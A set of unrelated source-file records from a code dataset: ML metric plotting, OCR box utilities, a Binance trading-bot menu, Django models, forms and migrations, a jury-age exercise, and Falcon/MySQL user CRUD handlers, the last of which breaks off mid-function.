| no_license | https://github.com/TsarSPb/Haustiere | facd64fc763024c08ffb9c480082cb4d790d7566 | 8a8b0f4d791d7e0da5f12560e4c475c6c18e34c0 | refs/heads/master | 2020-08-27T09:07:36.685143 | 2019-10-30T16:41:38 | 2019-10-30T16:41:38 | 217,311,786 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import matplotlib.pyplot as plt
def plot_results(results_list,partno):
models = [x[0] for x in results_list]
if partno==1:
cv_score_train_mean = [x[1][0] for x in results_list]
cv_score_val_mean = [x[1][1] for x in results_list]
cv_score_test_mean = [x[1][2] for x in results_list]
# Getting accuracies from conf matrices
pct_score_train_mean = [np.round(np.trace(x[3][0])/np.sum(x[3][0])*100,2) for x in results_list]
pct_score_val_mean = [np.round(np.trace(x[3][1])/np.sum(x[3][1])*100,2) for x in results_list]
pct_score_test_mean = [np.round(np.trace(x[3][2])/np.sum(x[3][2])*100,2) for x in results_list]
overestimated_train = [np.triu(x[3][0],k=1).sum() for x in results_list]
overestimated_val = [np.triu(x[3][1],k=1).sum() for x in results_list]
overestimated_test = [np.triu(x[3][2],k=1).sum() for x in results_list]
underestimated_train = [np.tril(x[3][0],k=-1).sum() for x in results_list]
underestimated_val = [np.tril(x[3][1],k=-1).sum() for x in results_list]
underestimated_test = [np.tril(x[3][2],k=-1).sum() for x in results_list]
plot_rows = 2
plot_cols = 2
plt.figure(figsize=(15,5))
plt.subplot(plot_rows,plot_cols,1)
plt.title('CV scores')
plt.plot(models,cv_score_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,cv_score_val_mean,label='val')
plt.plot(models,cv_score_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,2)
plt.title('% acc')
plt.plot(models,pct_score_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,pct_score_val_mean,label='val')
plt.plot(models,pct_score_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,3)
plt.title('Overestimated TTF')
plt.plot(models,overestimated_train,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,overestimated_val,label='val')
plt.plot(models,overestimated_test,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,4)
plt.title('Underestimated TTF')
plt.plot(models,underestimated_train,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,underestimated_val,label='val')
plt.plot(models,underestimated_test,label='test')
plt.legend()
return models, overestimated_train, overestimated_val, overestimated_test, underestimated_train, underestimated_val, underestimated_test, pct_score_train_mean, pct_score_val_mean, pct_score_test_mean
if partno==2:
f1_micro_train_mean = [x[4][0][0] for x in results_list]
f1_micro_val_mean = [x[4][1][0] for x in results_list]
f1_micro_test_mean = [x[4][2][0] for x in results_list]
f1_macro_train_mean = [x[4][0][1] for x in results_list]
f1_macro_val_mean = [x[4][1][1] for x in results_list]
f1_macro_test_mean = [x[4][2][1] for x in results_list]
f1_weighted_train_mean = [x[4][0][2] for x in results_list]
f1_weighted_val_mean = [x[4][1][2] for x in results_list]
f1_weighted_test_mean = [x[4][2][2] for x in results_list]
accuracy_train_mean = [x[4][0][3] for x in results_list]
accuracy_val_mean = [x[4][1][3] for x in results_list]
accuracy_test_mean = [x[4][2][3] for x in results_list]
plot_rows = 2
plot_cols = 2
plt.figure(figsize=(15,5))
plt.subplot(plot_rows,plot_cols,1)
plt.title('f1_micro')
plt.plot(models,f1_micro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,f1_micro_val_mean,label='val')
plt.plot(models,f1_micro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,2)
plt.title('f1_macro')
plt.plot(models,f1_macro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,f1_macro_val_mean,label='val')
plt.plot(models,f1_macro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,3)
plt.title('f1_weighted')
plt.plot(models,f1_weighted_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,f1_weighted_val_mean,label='val')
plt.plot(models,f1_weighted_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,4)
plt.title('accuracy')
plt.plot(models,accuracy_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,accuracy_val_mean,label='val')
plt.plot(models,accuracy_test_mean,label='test')
plt.legend()
if partno==3:
precision_micro_train_mean = [x[4][0][4] for x in results_list]
precision_micro_val_mean = [x[4][1][4] for x in results_list]
precision_micro_test_mean = [x[4][2][4] for x in results_list]
precision_macro_train_mean = [x[4][0][5] for x in results_list]
precision_macro_val_mean = [x[4][1][5] for x in results_list]
precision_macro_test_mean = [x[4][2][5] for x in results_list]
precision_weighted_train_mean = [x[4][0][6] for x in results_list]
precision_weighted_val_mean = [x[4][1][6] for x in results_list]
precision_weighted_test_mean = [x[4][2][6] for x in results_list]
recall_micro_train_mean = [x[4][0][7] for x in results_list]
recall_micro_val_mean = [x[4][1][7] for x in results_list]
recall_micro_test_mean = [x[4][2][7] for x in results_list]
recall_macro_train_mean = [x[4][0][8] for x in results_list]
recall_macro_val_mean = [x[4][1][8] for x in results_list]
recall_macro_test_mean = [x[4][2][8] for x in results_list]
recall_weighted_train_mean = [x[4][0][9] for x in results_list]
recall_weighted_val_mean = [x[4][1][9] for x in results_list]
recall_weighted_test_mean = [x[4][2][9] for x in results_list]
plot_rows = 2
plot_cols = 3
plt.figure(figsize=(15,5))
plt.subplot(plot_rows,plot_cols,1)
plt.title('precision_micro')
plt.plot(models,precision_micro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,precision_micro_val_mean,label='val')
plt.plot(models,precision_micro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,2)
plt.title('precision_macro')
plt.plot(models,precision_macro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,precision_macro_val_mean,label='val')
plt.plot(models,precision_macro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,3)
plt.title('precision_weighted')
plt.plot(models,precision_weighted_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,precision_weighted_val_mean,label='val')
plt.plot(models,precision_weighted_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,4)
plt.title('recall_micro')
plt.plot(models,recall_micro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,recall_micro_val_mean,label='val')
plt.plot(models,recall_micro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,5)
plt.title('recall_macro')
plt.plot(models,recall_macro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,recall_macro_val_mean,label='val')
plt.plot(models,recall_macro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,6)
plt.title('recall_weighted')
plt.plot(models,recall_weighted_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,recall_weighted_val_mean,label='val')
plt.plot(models,recall_weighted_test_mean,label='test')
plt.legend()
| UTF-8 | Python | false | false | 7,237 | py | 5 | support_func.py | 1 | 0.699599 | 0.6692 | 0 | 145 | 48.903448 | 201 |
Aurora11111/chineseocr | 9,448,928,072,159 | 5523f721a4e89b434db4a55dc3a2da202a5f0afd | ccb960e65bc5f1f4b82e5d7b7e25a0c07ca7162d | /detector/other.py | 3cc7173f78b4bab6b5419d06915ca09dfd516f9d | [
"MIT"
]
| permissive | https://github.com/Aurora11111/chineseocr | f9fcf071bda94c3bfbca1314096dcd46a8972c8c | 43ed6255aee6fad6ad2c66854681b26e7676defa | refs/heads/master | 2020-04-06T13:05:20.372898 | 2019-05-20T10:26:06 | 2019-05-20T10:26:06 | 157,483,488 | 2 | 0 | MIT | true | 2018-11-14T03:15:06 | 2018-11-14T03:15:05 | 2018-11-13T16:53:04 | 2018-11-13T16:53:02 | 8,090 | 0 | 0 | 0 | null | false | null | import cv2
import numpy as np
def prepare_img(im, mean):
"""
transform img into caffe's input img.
"""
im_data=np.transpose(im-mean, (2, 0, 1))
return im_data
def get_boxes(im, bboxes):
"""
boxes: bounding boxes
"""
text_recs=np.zeros((len(bboxes), 8), np.int)
im=im.copy()
index = 0
for box in bboxes:
b1 = box[6] - box[7] / 2
b2 = box[6] + box[7] / 2
x1 = box[0]
y1 = box[5] * box[0] + b1
x2 = box[2]
y2 = box[5] * box[2] + b1
x3 = box[0]
y3 = box[5] * box[0] + b2
x4 = box[2]
y4 = box[5] * box[2] + b2
disX = x2 - x1
disY = y2 - y1
width = np.sqrt(disX*disX + disY*disY)
fTmp0 = y3 - y1
fTmp1 = fTmp0 * disY / width
x = np.fabs(fTmp1*disX / width)
y = np.fabs(fTmp1*disY / width)
if box[5] < 0:
x1 -= x
y1 += y
x4 += x
y4 -= y
else:
x2 += x
y2 += y
x3 -= x
y3 -= y
text_recs[index, 0] = x1
text_recs[index, 1] = y1
text_recs[index, 2] = x2
text_recs[index, 3] = y2
text_recs[index, 4] = x3
text_recs[index, 5] = y3
text_recs[index, 6] = x4
text_recs[index, 7] = y4
index = index + 1
return text_recs,im
def threshold(coords, min_, max_):
return np.maximum(np.minimum(coords, max_), min_)
def clip_boxes(boxes, im_shape):
"""
Clip boxes to image boundaries.
"""
boxes[:, 0::2]=threshold(boxes[:, 0::2], 0, im_shape[1]-1)
boxes[:, 1::2]=threshold(boxes[:, 1::2], 0, im_shape[0]-1)
return boxes
def normalize(data):
if data.shape[0]==0:
return data
max_=data.max()
min_=data.min()
return (data-min_)/(max_-min_) if max_-min_!=0 else data-min_
def resize_im(im, scale, max_scale=None):
    """Resize so the short side equals `scale`, capping the long side at `max_scale`.

    Returns the resized image and the scale factor actually applied.
    """
    short_side = min(im.shape[0], im.shape[1])
    long_side = max(im.shape[0], im.shape[1])
    factor = float(scale) / short_side
    if max_scale is not None and factor * long_side > max_scale:
        factor = float(max_scale) / long_side
    return cv2.resize(im, (0, 0), fx=factor, fy=factor), factor
| UTF-8 | Python | false | false | 2,222 | py | 19 | other.py | 13 | 0.486049 | 0.436994 | 0 | 90 | 23.633333 | 69 |
NoisyPillow/twitter-binance-bridge-bot | 506,806,149,986 | 379a86aabbae1d0b3836d339288bf85c3c642f5c | f5671dc87867e718b654cdebc69f4c9aaefec50a | /UiCore.py | 62893d20994026bcd27df16d8f511839da130491 | [
"LicenseRef-scancode-warranty-disclaimer"
]
| no_license | https://github.com/NoisyPillow/twitter-binance-bridge-bot | 519f2bee78fc3f6ef79971600447b2a8b10e4ba1 | 2079ba5593769c47960108f62590c6db39d0cea3 | refs/heads/master | 2023-05-04T21:07:32.422112 | 2021-05-12T09:55:16 | 2021-05-12T09:55:16 | 364,655,277 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from PyInquirer import Separator, prompt
from BinanceTwitterBridge import BinanceTwitterBridge
from ConfigManager import Config
import colorama
from colorama import Fore, Style
from art import tprint
import json
class CLI:
    """Interactive console for the Twitter-Binance bridge bot.

    Builds the bridge and its Binance client, prints an account summary
    banner, then drops into a self-recursing menu loop.
    """

    def __init__(self):
        # colorama enables the ANSI color escapes used below on Windows too.
        colorama.init()
        self.config = Config()
        self.bridge = BinanceTwitterBridge()
        self.binance_client = self.bridge.binance_client
        print('\n')
        tprint("T-B Bridge", font="random")
        print("----------------------------------------------------------")
        print(f"Current {self.config.ASSET} value: ")
        print(
            " \u001b[33m ❯ " +
            f"{self.binance_client.get_price(self.config.ASSET + self.config.BASE_ASSET)} {self.config.BASE_ASSET}\033[0m"
        )
        print(f"Current {self.config.BASE_ASSET} balance: ")
        print(
            " \u001b[33m ❯ " +
            f"{self.binance_client.get_asset_blance(self.config.BASE_ASSET)} {self.config.BASE_ASSET}\033[0m"
        )
        print(f"Gain summary: ")
        print(" \u001b[33m ❯ " +
              f"{self.get_gain_summary()} {self.config.BASE_ASSET}\033[0m")
        print("----------------------------------------------------------")
        # Constructor never returns until the user exits the menu.
        self.main_menu()

    def get_gain_summary(self):
        """Return net proceeds (sold - bought) parsed from trades.log.

        Each log line is expected to hold a JSON payload as its 4th
        space-separated field with price/qty/commission keys.
        """
        bought = 0.0
        sold = 0.0
        with open('trades.log', 'r') as log_file:
            trades = log_file.readlines()
            for trade in trades:
                details = json.loads(trade.split(' ', 3)[3])
                if 'BUY' in trade:
                    # NOTE(review): commission is subtracted from the buy cost
                    # as well as from sell proceeds — confirm intended sign.
                    bought += float(details['price']) * float(
                        details['qty']) - float(details['commission'])
                elif 'SELL' in trade:
                    sold += float(details['price']) * float(
                        details['qty']) - float(details['commission'])
        return sold - bought

    def main_menu(self):
        """Top-level menu: start the bridge, exit, or open settings."""
        main_menu_prompt = {
            'type': 'list',
            'name': 'main-menu',
            'message': 'Twitter-Binance bridge bot',
            'choices': ['Start bot', 'Exit',
                        Separator(), 'Settings']
        }
        answer = prompt(main_menu_prompt)['main-menu']
        if answer == 'Start bot':
            self.bridge.start()
        elif answer == 'Exit':
            exit()
        elif answer == 'Settings':
            self.settings_menu()

    def settings_menu(self):
        """Settings loop: edit config values, reload the bridge, recurse."""
        settings_menu_prompt = {
            'type':
            'list',
            'name':
            'settings_menu',
            'message':
            'Settings',
            'choices': [
                'Set ASSET', 'Set BASE_ASSET', 'Set BASE_ASSET_QUANTITY',
                'Set INTERVAL',
                Separator(), 'Return'
            ]
        }
        answer = prompt(settings_menu_prompt)['settings_menu']
        if answer == 'Set ASSET':
            set_asset_prompt = {
                'type':
                'input',
                'name':
                'asset_input',
                'message':
                f'What asset do you want to buy ? (currently {self.config.get_asset()})'
            }
            asset = prompt(set_asset_prompt)['asset_input']
            self.config.update_asset(asset)
            # Bridge caches config values, so force it to re-read them.
            self.bridge.reload_config()
            self.settings_menu()
        elif answer == 'Set BASE_ASSET':
            set_base_asset_prompt = {
                'type':
                'input',
                'name':
                'base_asset_input',
                'message':
                f'What base asset do you want to buy with ? (currently {self.config.get_base_asset()})'
            }
            base_asset = prompt(set_base_asset_prompt)['base_asset_input']
            self.config.update_base_asset(base_asset)
            self.bridge.reload_config()
            self.settings_menu()
        elif answer == 'Set BASE_ASSET_QUANTITY':
            set_base_asset_quantity_prompt = {
                'type':
                'input',
                'name':
                'base_asset_quantity_input',
                'message':
                f'What base asset quantity do you want to use ? (currently {self.config.get_base_asset_quantity()} {self.config.get_base_asset()})'
            }
            base_asset_quantity = prompt(
                set_base_asset_quantity_prompt)['base_asset_quantity_input']
            self.config.update_base_asset_quantity(base_asset_quantity)
            self.bridge.reload_config()
            self.settings_menu()
        elif answer == 'Set INTERVAL':
            interval_prompt = {
                'type':
                'input',
                'name':
                'interval_input',
                'message':
                f'How many time between buy and sell ? (currently {self.config.get_interval()} seconds)'
            }
            interval = prompt(interval_prompt)['interval_input']
            self.config.update_interval(interval)
            self.bridge.reload_config()
            self.settings_menu()
        elif answer == 'Return':
            self.main_menu()
| UTF-8 | Python | false | false | 5,116 | py | 9 | UiCore.py | 5 | 0.486888 | 0.480431 | 0 | 137 | 36.29927 | 147 |
jesperswillem/protwis | 14,972,256,024,126 | 406470ff4b50d7526ebbc620a810cedb8e36744c | 80fe2166509c215a02081b5823035fcc0b7eac31 | /contactnetwork/models.py | fcb3440e5734c0e3d3f764fdb85a17111ae8d7b0 | [
"Apache-2.0"
]
| permissive | https://github.com/jesperswillem/protwis | e3c6b1fae456272d4849d6b79ff7ed5948b1e787 | a36cd60fe9724d61b2c78c4d16f9d3697543b8aa | refs/heads/master | 2021-01-18T03:05:47.743570 | 2019-03-22T14:17:16 | 2019-06-06T10:11:35 | 52,868,185 | 0 | 0 | Apache-2.0 | true | 2019-06-25T11:12:37 | 2016-03-01T10:23:31 | 2019-06-24T10:07:00 | 2019-06-25T11:11:55 | 32,910 | 0 | 0 | 1 | Python | false | false | from structure.models import Structure
from django.db import models
class InteractingResiduePair(models.Model):
    """One residue-residue contact pair observed in a referenced structure."""
    referenced_structure = models.ForeignKey('structure.Structure', on_delete=models.CASCADE)
    res1 = models.ForeignKey('residue.Residue', related_name='residue1', on_delete=models.CASCADE)
    res2 = models.ForeignKey('residue.Residue', related_name='residue2', on_delete=models.CASCADE)
    @classmethod
    def truncate(cls):
        """Empty the table and reset its identity sequence (PostgreSQL TRUNCATE ... CASCADE)."""
        from django.db import connection
        with connection.cursor() as cursor:
            cursor.execute('TRUNCATE TABLE "{0}" RESTART IDENTITY CASCADE'.format(cls._meta.db_table))
    class Meta():
        db_table = 'interacting_residue_pair'
class Interaction(models.Model):
    """A typed interaction annotation attached to an InteractingResiduePair."""
    interacting_pair = models.ForeignKey('contactnetwork.InteractingResiduePair', on_delete=models.CASCADE)
    interaction_type = models.CharField(max_length=100)
    specific_type = models.CharField(max_length=100, null=True)
    # interaction_level -> 0 - normal definition, 1 - loosened definition
    interaction_level = models.IntegerField(null=False, default=0)
    # Names of the two interacting atoms within res1/res2 of the pair.
    atomname_residue1 = models.CharField(max_length=10, null=True)
    atomname_residue2 = models.CharField(max_length=10, null=True)
    @classmethod
    def truncate(cls):
        """Empty the table and reset its identity sequence (PostgreSQL TRUNCATE ... CASCADE)."""
        from django.db import connection
        with connection.cursor() as cursor:
            cursor.execute('TRUNCATE TABLE "{0}" RESTART IDENTITY CASCADE'.format(cls._meta.db_table))
    class Meta():
        db_table = 'interaction'
class Distance(models.Model):
    """Pairwise residue distance measured within one structure."""
    structure = models.ForeignKey('structure.Structure', related_name='distances', on_delete=models.CASCADE, null=True)
    res1 = models.ForeignKey('residue.Residue', related_name='distance_residue1', on_delete=models.CASCADE, null=True)
    res2 = models.ForeignKey('residue.Residue', related_name='distance_residue2', on_delete=models.CASCADE, null=True)
    # Generic residue numbers of the two residues; gns_pair is the indexed
    # combination used for fast pair lookups.
    gn1 = models.CharField(max_length=100, null=True)
    gn2 = models.CharField(max_length=100, null=True)
    gns_pair = models.CharField(db_index=True, max_length=100, null=True)
    # NOTE(review): stored as an integer — presumably a scaled distance;
    # confirm the unit/scaling used by the loader.
    distance = models.IntegerField()
    @classmethod
    def truncate(cls):
        """Empty the table and reset its identity sequence (PostgreSQL TRUNCATE ... CASCADE)."""
        from django.db import connection
        with connection.cursor() as cursor:
            cursor.execute('TRUNCATE TABLE "{0}" RESTART IDENTITY CASCADE'.format(cls._meta.db_table))
    class Meta():
        db_table = 'distance'
| UTF-8 | Python | false | false | 2,408 | py | 11 | models.py | 8 | 0.712209 | 0.696844 | 0 | 57 | 41.245614 | 119 |
james-chang727/Python_practice | 16,793,322,156,428 | 58f07b963f4b59cab29128c023ae15b762d90b98 | e90ea647cb2b632842f50126dd20c87a990d961f | /003 conditions exercise/Q2.py | c8ea4558fd59151f9c36c082291d3640cc44b5dd | []
| no_license | https://github.com/james-chang727/Python_practice | 9cad6e7c83cafffc4bc3005c401bde91f3dd29bb | adcd8ff18c2aa6ee685c79b13cdc08623e91d1bb | refs/heads/master | 2022-11-06T13:28:13.398066 | 2020-06-23T16:30:51 | 2020-06-23T16:30:51 | 262,010,137 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | age = int(input("Enter your age:"))
crim = str(input("Do you have a criminal record (y/n):"))
age_jury = 18 <= age <= 65
if age_jury and crim == "n":
print("You are required to do jury service.")
elif not age_jury or crim == "y":
print("You are excluded from jury service.")
elif crim != "y" or "n":
print("Incorrect input.")
| UTF-8 | Python | false | false | 339 | py | 35 | Q2.py | 34 | 0.625369 | 0.613569 | 0 | 10 | 32.9 | 57 |
Major101/Attendance | 4,355,096,844,409 | b362accf0fb469de26f21d2de8959b842b5d6146 | 3b872b7a42b207b9f402d63d9535cec2f67eb8f4 | /Attendance/attendance_tracker/migrations/0008_auto_20191127_1200.py | 46ff10899971fd6f8d4aab71e535e71d34ecf8e6 | []
| no_license | https://github.com/Major101/Attendance | 56069d635cee4200f73befccef659ae5aa54c174 | 1515ef3e9a60d5560b30f5b78f256104f4314e07 | refs/heads/master | 2020-09-21T00:58:43.752105 | 2019-12-05T06:47:07 | 2019-12-05T06:47:07 | 224,634,874 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.2.7 on 2019-11-27 12:00
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: renames Employee.time to Employee.arrived_time."""

    dependencies = [
        ('attendance_tracker', '0007_employee_time'),
    ]

    operations = [
        migrations.RenameField(
            model_name='employee',
            old_name='time',
            new_name='arrived_time',
        ),
    ]
| UTF-8 | Python | false | false | 375 | py | 12 | 0008_auto_20191127_1200.py | 9 | 0.578667 | 0.528 | 0 | 18 | 19.833333 | 53 |
veckerid/django-xmpp | 18,004,502,939,593 | 64dc306352ca8b3e1cc7123546fbca525e6e1674 | e58249581c88d7c77e18d9345d3bc69b6469b772 | /forms.py | 1c1e28a60f5bcaf3b604d356c4d1b6c801f55e6b | []
| no_license | https://github.com/veckerid/django-xmpp | df8b8bb708dc333cd0746cdc47aa8a697211522b | 3af0db45f30218d17d56975b5e868bdb09743b28 | refs/heads/master | 2020-05-19T23:13:58.799248 | 2009-08-21T19:54:56 | 2009-08-21T19:54:56 | 34,379,252 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2009 Marcello Bontempo Salgueiro and contributors
#
# This file is part of Django XMPP.
#
# Django XMPP is free software under terms of the GNU Lesser
# General Public License version 3 (LGPLv3) as published by the Free
# Software Foundation. See the file README for copying conditions.
#
from django import forms
class loginFORM(forms.Form):
    """Login form collecting a Jabber ID and its password."""
    jabber_id = forms.CharField(max_length=300)
    jabber_pwd = forms.CharField(max_length=20, widget=forms.PasswordInput)
class sendFORM(forms.Form):
    """Form for sending a chat message to another XMPP user."""
    user = forms.CharField(max_length=300)
    msg = forms.CharField(widget=forms.Textarea())
class authJIDFORM(forms.Form):
    """Form used to authorize (accept a subscription from) another JID."""
    jid_auth = forms.CharField(max_length=300)
# Presence choices for changeSTATUS as (stored value, display label) pairs.
# NOTE(review): 'Alway' looks like a typo for 'Away' — do not rename without
# checking stored values and the XMPP presence mapping that consumes them.
STATUS_C = (
     ('Connected','Connected'),
     ('Alway','Alway'),
     ('Busy','Busy'),
)
class changeSTATUS(forms.Form):
    """Dropdown form for switching the user's presence status."""
    status = forms.ChoiceField(widget=forms.Select(),choices=STATUS_C)
| UTF-8 | Python | false | false | 889 | py | 12 | forms.py | 5 | 0.731159 | 0.710911 | 0 | 32 | 26.78125 | 72 |
shen-huang/selfteaching-python-camp | 7,937,099,610,551 | 16274687f2c434de16e8c0712ae10a99f8a02cb2 | 9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612 | /exercises/1901010112/1001S02E05_array.py | 58c6311ddf0b4346c7b3b4c8b5d04a8f94c9f2df | []
| no_license | https://github.com/shen-huang/selfteaching-python-camp | e8410bfc06eca24ee2866c5d890fd063e9d4be89 | 459f90c9f09bd3a3df9e776fc64dfd64ac65f976 | refs/heads/master | 2022-05-02T05:39:08.932008 | 2022-03-17T07:56:30 | 2022-03-17T07:56:30 | 201,287,222 | 9 | 6 | null | true | 2019-08-08T15:34:26 | 2019-08-08T15:34:25 | 2019-08-08T14:44:30 | 2019-08-08T15:18:39 | 45,209 | 0 | 0 | 0 | null | false | false | #将数组 [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] 翻转
# Reverse the digits 0-9, join them into a string, slice characters 3-8,
# reverse that slice into an int, and show it in binary/octal/hex.
a = list(range(10))
a.reverse()  # in-place reversal of the list
print('列表翻转 ==>',a)
# Join the reversed digits into one string.
b = "".join(map(str, a))
print("输出字符串 ==>",b)
s = b
c = s[2:8]  # characters 3 through 8 (0-based slice 2:8)
print("切片取出3-8字符==>",c)
# Reverse the slice and parse it as a base-10 integer.
d = int("".join(reversed(c)))
print('获得的字符串进行翻转并转化为int型',d)
print('转换成二进制==>',bin(d))
print('转换成八进制==>',oct(d))
print('转换成十六进制==>',hex(d))
| UTF-8 | Python | false | false | 671 | py | 2,882 | 1001S02E05_array.py | 2,421 | 0.590164 | 0.529274 | 0 | 15 | 27.466667 | 67 |
xiaoyaochen/ACshare | 14,010,183,343,854 | 455663f2fe028301c3d9d92c53a2aa9a0a685956 | 61267e7bb146e67d7ce5b81ef8c6fb32cdb1088e | /apps/forums/migrations/0003_auto_20190409_2323.py | 188421fffb24c6c2a66cff8ac9ab1a98616d354e | []
| no_license | https://github.com/xiaoyaochen/ACshare | 8f7e294724d90925f9fb80799c9fbd3680c01057 | 482985231e0e6d8632c8504a30f994ba246a060a | refs/heads/master | 2020-05-07T11:57:43.663344 | 2019-04-20T14:55:55 | 2019-04-20T14:55:55 | 180,483,088 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.0 on 2019-04-09 23:23
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: removes the forum comment and up/down-vote models
    and renames Forums.comment_count to view_count."""

    dependencies = [
        ('forums', '0002_auto_20190408_2007'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='forumscomment',
            name='forums',
        ),
        migrations.RemoveField(
            model_name='forumscomment',
            name='parent_conment',
        ),
        migrations.RemoveField(
            model_name='forumscomment',
            name='user',
        ),
        migrations.AlterUniqueTogether(
            name='forumsupdown',
            unique_together=set(),
        ),
        migrations.RemoveField(
            model_name='forumsupdown',
            name='forums',
        ),
        migrations.RemoveField(
            model_name='forumsupdown',
            name='user',
        ),
        migrations.RenameField(
            model_name='forums',
            old_name='comment_count',
            new_name='view_count',
        ),
        migrations.DeleteModel(
            name='ForumsComment',
        ),
        migrations.DeleteModel(
            name='ForumsUpDown',
        ),
    ]
| UTF-8 | Python | false | false | 1,195 | py | 48 | 0003_auto_20190409_2323.py | 30 | 0.515481 | 0.490377 | 0 | 48 | 23.895833 | 46 |
AvishaySebban/Zakuski | 13,142,599,945,349 | 9ef1180d585551d3668f37976d56a637771027f6 | cd908f412af49aa848650707d424db7c3a605661 | /resources.py | c0c3aeb7444a5c72d6c595d2ec5f089f674a09c7 | []
| no_license | https://github.com/AvishaySebban/Zakuski | 70949947733048366074a8eb2f012f520c23d983 | 3daf4f5994d108b6db3eba710b9d1cc88d40c67d | refs/heads/master | 2021-01-19T19:32:06.942766 | 2017-05-23T06:48:43 | 2017-05-23T06:48:43 | 88,351,987 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import falcon
import MySQLdb
import json
import db_conf
class GetUser:
    """Falcon resource returning every row of the USER table as JSON."""

    def on_get(self, req, resp):
        try:
            db = MySQLdb.connect(**db_conf.dbConfig)
            # DictCursor yields each row as a column-name -> value mapping.
            cursor = db.cursor(MySQLdb.cursors.DictCursor)
            cursor.execute("select * from USER")
            users = [
                {
                    "user_id": row['user_id'],
                    "UserName": row['UserName'],
                    "Password": row['Password'],
                    "Email": row['Email']
                }
                for row in cursor.fetchall()
            ]
            resp.status = falcon.HTTP_200
            resp.body = json.dumps({'User': users}, encoding='utf-8')
            cursor.close()
            db.close()
        except Exception as e:
            # Any failure is reported to the client as a 500 with the message.
            resp.body = json.dumps({'error': str(e)})
            resp.status = falcon.HTTP_500
        return resp
class AddUser:
    """Falcon resource inserting a new USER row from a JSON request body."""

    def on_post(self, req, resp):
        try:
            db = MySQLdb.connect(**db_conf.dbConfig)
            cursor = db.cursor()
            raw_json = req.stream.read()
            # NOTE(review): json.loads(..., encoding=...) is a Python 2 idiom;
            # the kwarg was removed in Python 3.9 — confirm the target runtime.
            data = json.loads(raw_json, encoding='utf-8')
            # Parameterized query: values are bound, not string-formatted.
            q = """INSERT INTO USER (user_id, UserName, Password, Email) VALUES(%s,%s,%s,%s)"""
            cursor.execute(q, (data['user_id'], data['UserName'], data['Password'], data['Email']))
            db.commit()
            cursor.close()
            output = {
                'status': "Data successfully saved"
            }
            resp.status = falcon.HTTP_200
            data_resp = json.dumps(output, encoding='utf-8')
            resp.body = data_resp
            db.close()
        except Exception as e:
            # NOTE(review): if connect() itself raised, `db` is unbound here
            # and rollback() raises NameError, masking the original error.
            db.rollback()
            resp.body = json.dumps({'error': str(e)})
            resp.status = falcon.HTTP_500
        return resp
class UpdateUser:
    """Falcon resource updating the USER row identified by its user_id."""

    def on_put(self, req, resp):
        try:
            db = MySQLdb.connect(**db_conf.dbConfig)
            cursor = db.cursor()
            raw_json = req.stream.read()
            data = json.loads(raw_json, encoding='utf-8')
            q = """UPDATE `USER` SET `user_id`=%s, `UserName`=%s, `Password`=%s, `Email`=%s WHERE user_id=%s"""
            # BUG FIX: the statement has five %s placeholders but only four
            # values were bound, so execute() raised on every PUT. Bind
            # user_id again for the WHERE clause.
            cursor.execute(q, (data['user_id'], data['UserName'],
                               data['Password'], data['Email'],
                               data['user_id']))
            db.commit()
            cursor.close()
            output = {
                'status': "Data successfully changed"
            }
            resp.status = falcon.HTTP_200
            data_resp = json.dumps(output, encoding='utf-8')
            resp.body = data_resp
            db.close()
        except Exception as e:
            db.rollback()
            resp.body = json.dumps({'error': str(e)})
            resp.status = falcon.HTTP_500
        return resp
class DeleteUser:
    """Falcon resource deleting the USER row named by the user_id query param."""

    def on_delete(self, req, resp):
        try:
            user_id = req.get_param('user_id')
            # Reject missing/empty ids up front instead of issuing a no-op DELETE.
            if user_id is None or user_id == "":
                resp.body = json.dumps({'error': 'Parameter user_id is Wrong'})
                resp.status = falcon.HTTP_500
                return resp
            db = MySQLdb.connect(**db_conf.dbConfig)
            cursor = db.cursor()
            q = """DELETE FROM `USER` WHERE user_id=%s"""
            cursor.execute(q, (user_id,))
            db.commit()
            cursor.close()
            output = {
                'status': "Data successfully deleted"
            }
            resp.status = falcon.HTTP_200
            data_resp = json.dumps(output, encoding='utf-8')
            resp.body = data_resp
        except Exception as e:
            # NOTE(review): if the failure happened before connect(), `db` is
            # unbound here and rollback() raises NameError, hiding the cause.
